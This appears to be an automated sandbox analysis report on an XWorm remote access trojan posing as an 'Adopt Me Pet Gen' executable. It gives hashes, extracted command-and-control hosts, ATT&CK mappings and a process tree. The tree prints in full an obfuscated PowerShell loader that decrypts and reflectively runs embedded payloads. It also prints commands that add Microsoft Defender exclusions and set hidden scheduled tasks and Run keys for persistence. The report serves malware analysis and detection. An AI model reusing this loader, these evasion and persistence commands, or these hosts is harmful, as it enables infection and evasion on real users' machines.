xworm | 5f90564e4d8c9f2c5a77ffe433d1717a4ede588238e82056cf855db61b5d432c

Analysis

max time kernel
25s
max time network
37s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
03/07/2024, 13:26

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Adopt Me Pet Gen (1).exe
Size

1.2MB
MD5

f9c02b1fadb6318ea0644429e91bab26
SHA1

6e9602dd27a921a6c87efd452ca33b96be07024b
SHA256

5f90564e4d8c9f2c5a77ffe433d1717a4ede588238e82056cf855db61b5d432c
SHA512

c61a5692fe9a21b34effd7b1a93b9bbc849d58e4aad1cf23cfc5045c44db1135ed8d7e73f8b9c1690caf3e674ba5d2e1fd61d124e00bbcd7b4f2b2b6c7138498
SSDEEP

24576:NB6Zzj8DE+VzvhRpB9A4p3jV9kQCtwoHk/poO5CeJRNcZSNPw:nrhRp7zB9UwoE/pxDcMN

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

improve-dating.gl.at.ply.gg:14761

wiz.bounceme.net:6000

Attributes

Install_directory
%ProgramData%

aes.plain

Signatures

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral1/memory/4700-48-0x00000000079B0000-0x0000000007A08000-memory.dmp	family_xworm
behavioral1/memory/1152-139-0x00000000068F0000-0x0000000006906000-memory.dmp	family_xworm
behavioral1/memory/4700-170-0x000000000B1A0000-0x000000000B1AE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	4700	powershell.exe
3	4700	powershell.exe
4	1152	powershell.exe
6	4700	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2224	powershell.exe
1116	powershell.exe
1152	powershell.exe
2324	powershell.exe
4616	powershell.exe
1932	powershell.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Windows\CurrentVersion\Run\powershell = "C:\\Users\\Admin\\AppData\\Roaming\\powershell.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Windows\CurrentVersion\Run\powershell = "C:\\ProgramData\\powershell.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3396	schtasks.exe
4768	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2224	powershell.exe
4700	powershell.exe
2224	powershell.exe
4700	powershell.exe
1116	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
1116	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
2324	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
2324	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4616	powershell.exe
4616	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
1152	powershell.exe
1152	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
1932	powershell.exe
1932	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe
1152	powershell.exe
1152	powershell.exe
4700	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	4700	powershell.exe
Token: SeDebugPrivilege	1116	powershell.exe
Token: SeDebugPrivilege	2324	powershell.exe
Token: SeIncreaseQuotaPrivilege	1116	powershell.exe
Token: SeSecurityPrivilege	1116	powershell.exe
Token: SeTakeOwnershipPrivilege	1116	powershell.exe
Token: SeLoadDriverPrivilege	1116	powershell.exe
Token: SeSystemProfilePrivilege	1116	powershell.exe
Token: SeSystemtimePrivilege	1116	powershell.exe
Token: SeProfSingleProcessPrivilege	1116	powershell.exe
Token: SeIncBasePriorityPrivilege	1116	powershell.exe
Token: SeCreatePagefilePrivilege	1116	powershell.exe
Token: SeBackupPrivilege	1116	powershell.exe
Token: SeRestorePrivilege	1116	powershell.exe
Token: SeShutdownPrivilege	1116	powershell.exe
Token: SeDebugPrivilege	1116	powershell.exe
Token: SeSystemEnvironmentPrivilege	1116	powershell.exe
Token: SeRemoteShutdownPrivilege	1116	powershell.exe
Token: SeUndockPrivilege	1116	powershell.exe
Token: SeManageVolumePrivilege	1116	powershell.exe
Token: 33	1116	powershell.exe
Token: 34	1116	powershell.exe
Token: 35	1116	powershell.exe
Token: 36	1116	powershell.exe
Token: SeIncreaseQuotaPrivilege	1116	powershell.exe
Token: SeSecurityPrivilege	1116	powershell.exe
Token: SeTakeOwnershipPrivilege	1116	powershell.exe
Token: SeLoadDriverPrivilege	1116	powershell.exe
Token: SeSystemProfilePrivilege	1116	powershell.exe
Token: SeSystemtimePrivilege	1116	powershell.exe
Token: SeProfSingleProcessPrivilege	1116	powershell.exe
Token: SeIncBasePriorityPrivilege	1116	powershell.exe
Token: SeCreatePagefilePrivilege	1116	powershell.exe
Token: SeBackupPrivilege	1116	powershell.exe
Token: SeRestorePrivilege	1116	powershell.exe
Token: SeShutdownPrivilege	1116	powershell.exe
Token: SeDebugPrivilege	1116	powershell.exe
Token: SeSystemEnvironmentPrivilege	1116	powershell.exe
Token: SeRemoteShutdownPrivilege	1116	powershell.exe
Token: SeUndockPrivilege	1116	powershell.exe
Token: SeManageVolumePrivilege	1116	powershell.exe
Token: 33	1116	powershell.exe
Token: 34	1116	powershell.exe
Token: 35	1116	powershell.exe
Token: 36	1116	powershell.exe
Token: SeIncreaseQuotaPrivilege	1116	powershell.exe
Token: SeSecurityPrivilege	1116	powershell.exe
Token: SeTakeOwnershipPrivilege	1116	powershell.exe
Token: SeLoadDriverPrivilege	1116	powershell.exe
Token: SeSystemProfilePrivilege	1116	powershell.exe
Token: SeSystemtimePrivilege	1116	powershell.exe
Token: SeProfSingleProcessPrivilege	1116	powershell.exe
Token: SeIncBasePriorityPrivilege	1116	powershell.exe
Token: SeCreatePagefilePrivilege	1116	powershell.exe
Token: SeBackupPrivilege	1116	powershell.exe
Token: SeRestorePrivilege	1116	powershell.exe
Token: SeShutdownPrivilege	1116	powershell.exe
Token: SeDebugPrivilege	1116	powershell.exe
Token: SeSystemEnvironmentPrivilege	1116	powershell.exe
Token: SeRemoteShutdownPrivilege	1116	powershell.exe
Token: SeUndockPrivilege	1116	powershell.exe
Token: SeManageVolumePrivilege	1116	powershell.exe
Token: 33	1116	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4700	powershell.exe
1152	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2052 wrote to memory of 4904	2052	Adopt Me Pet Gen (1).exe	77
PID 2052 wrote to memory of 4904	2052	Adopt Me Pet Gen (1).exe	77
PID 2052 wrote to memory of 4904	2052	Adopt Me Pet Gen (1).exe	77
PID 2052 wrote to memory of 724	2052	Adopt Me Pet Gen (1).exe	79
PID 2052 wrote to memory of 724	2052	Adopt Me Pet Gen (1).exe	79
PID 2052 wrote to memory of 724	2052	Adopt Me Pet Gen (1).exe	79
PID 4904 wrote to memory of 1088	4904	cmd.exe	81
PID 4904 wrote to memory of 1088	4904	cmd.exe	81
PID 4904 wrote to memory of 1088	4904	cmd.exe	81
PID 4904 wrote to memory of 2224	4904	cmd.exe	82
PID 4904 wrote to memory of 2224	4904	cmd.exe	82
PID 4904 wrote to memory of 2224	4904	cmd.exe	82
PID 724 wrote to memory of 1084	724	cmd.exe	83
PID 724 wrote to memory of 1084	724	cmd.exe	83
PID 724 wrote to memory of 1084	724	cmd.exe	83
PID 724 wrote to memory of 4700	724	cmd.exe	84
PID 724 wrote to memory of 4700	724	cmd.exe	84
PID 724 wrote to memory of 4700	724	cmd.exe	84
PID 2224 wrote to memory of 1116	2224	powershell.exe	85
PID 2224 wrote to memory of 1116	2224	powershell.exe	85
PID 2224 wrote to memory of 1116	2224	powershell.exe	85
PID 4700 wrote to memory of 3268	4700	powershell.exe	52
PID 4700 wrote to memory of 5116	4700	powershell.exe	68
PID 4700 wrote to memory of 1960	4700	powershell.exe	69
PID 4700 wrote to memory of 3444	4700	powershell.exe	54
PID 4700 wrote to memory of 1556	4700	powershell.exe	25
PID 4700 wrote to memory of 1948	4700	powershell.exe	32
PID 4700 wrote to memory of 1352	4700	powershell.exe	23
PID 4700 wrote to memory of 1744	4700	powershell.exe	29
PID 4700 wrote to memory of 1268	4700	powershell.exe	21
PID 4700 wrote to memory of 948	4700	powershell.exe	11
PID 4700 wrote to memory of 1068	4700	powershell.exe	16
PID 4700 wrote to memory of 1136	4700	powershell.exe	18
PID 4700 wrote to memory of 2904	4700	powershell.exe	50
PID 4700 wrote to memory of 2508	4700	powershell.exe	41
PID 4700 wrote to memory of 2696	4700	powershell.exe	47
PID 4700 wrote to memory of 2928	4700	powershell.exe	70
PID 4700 wrote to memory of 1312	4700	powershell.exe	22
PID 4700 wrote to memory of 2688	4700	powershell.exe	46
PID 4700 wrote to memory of 2140	4700	powershell.exe	73
PID 4700 wrote to memory of 2088	4700	powershell.exe	36
PID 4700 wrote to memory of 2736	4700	powershell.exe	48
PID 4700 wrote to memory of 1284	4700	powershell.exe	71
PID 4700 wrote to memory of 2260	4700	powershell.exe	39
PID 4700 wrote to memory of 4880	4700	powershell.exe	67
PID 4700 wrote to memory of 1076	4700	powershell.exe	17
PID 4700 wrote to memory of 1464	4700	powershell.exe	24
PID 4700 wrote to memory of 1852	4700	powershell.exe	33
PID 4700 wrote to memory of 1652	4700	powershell.exe	28
PID 4700 wrote to memory of 3420	4700	powershell.exe	53
PID 4700 wrote to memory of 2628	4700	powershell.exe	44
PID 4700 wrote to memory of 1244	4700	powershell.exe	20
PID 4700 wrote to memory of 848	4700	powershell.exe	14
PID 4700 wrote to memory of 2516	4700	powershell.exe	42
PID 4700 wrote to memory of 1628	4700	powershell.exe	27
PID 4700 wrote to memory of 4384	4700	powershell.exe	62
PID 4700 wrote to memory of 3988	4700	powershell.exe	60
PID 4700 wrote to memory of 1620	4700	powershell.exe	26
PID 4700 wrote to memory of 436	4700	powershell.exe	15
PID 4700 wrote to memory of 2208	4700	powershell.exe	38
PID 4700 wrote to memory of 1812	4700	powershell.exe	31
PID 4700 wrote to memory of 2008	4700	powershell.exe	34
PID 4700 wrote to memory of 1804	4700	powershell.exe	30
PID 4700 wrote to memory of 1996	4700	powershell.exe	35

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
PID:804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:1004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:848

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1244

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1464

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2208

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2260

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2904

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3268
- C:\Users\Admin\AppData\Local\Temp\Adopt Me Pet Gen (1).exe
  "C:\Users\Admin\AppData\Local\Temp\Adopt Me Pet Gen (1).exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4904
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      4⤵
      PID:1088
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Command and Scripting Interpreter: PowerShell
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2224
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_714_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_714.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1116
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_714.vbs"
        5⤵
        
        PID:3548
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_714.bat" "
        6⤵
        
        PID:1416
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_714.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        7⤵
        
        PID:916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1152
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\ProgramData\powershell.exe"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Adopt Me Pet Gen V1.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:724
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T029hwB4sm8cJqB1jmEq2G3CmN2nK5wB8KMs/WlksUE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R7pTbMZuKhk+QlEIz4uESQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gIXPW=New-Object System.IO.MemoryStream(,$param_var); $fecCy=New-Object System.IO.MemoryStream; $xsbmd=New-Object System.IO.Compression.GZipStream($gIXPW, [IO.Compression.CompressionMode]::Decompress); $xsbmd.CopyTo($fecCy); $xsbmd.Dispose(); $gIXPW.Dispose(); $fecCy.Dispose(); $fecCy.ToArray();}function execute_function($param_var,$param2_var){ $NrcSb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RWwRu=$NrcSb.EntryPoint; $RWwRu.Invoke($null, $param2_var);}$dJzaT = 'C:\Users\Admin\AppData\Local\Temp\Adopt Me Pet Gen V1.bat';$host.UI.RawUI.WindowTitle = $dJzaT;$Nyode=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dJzaT).Split([Environment]::NewLine);foreach ($fxpuj in $Nyode) { if ($fxpuj.StartsWith('XAvkuBrDOzlbOpfwpjkB')) { $iViWa=$fxpuj.Substring(20); break; }}$payloads_var=[string[]]$iViWa.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      4⤵
      PID:1084
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      4⤵
      Blocklisted process makes network request
      Drops startup file
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4700
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2324
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4616
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\powershell.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1932
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\Users\Admin\AppData\Roaming\powershell.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4384

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:5116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

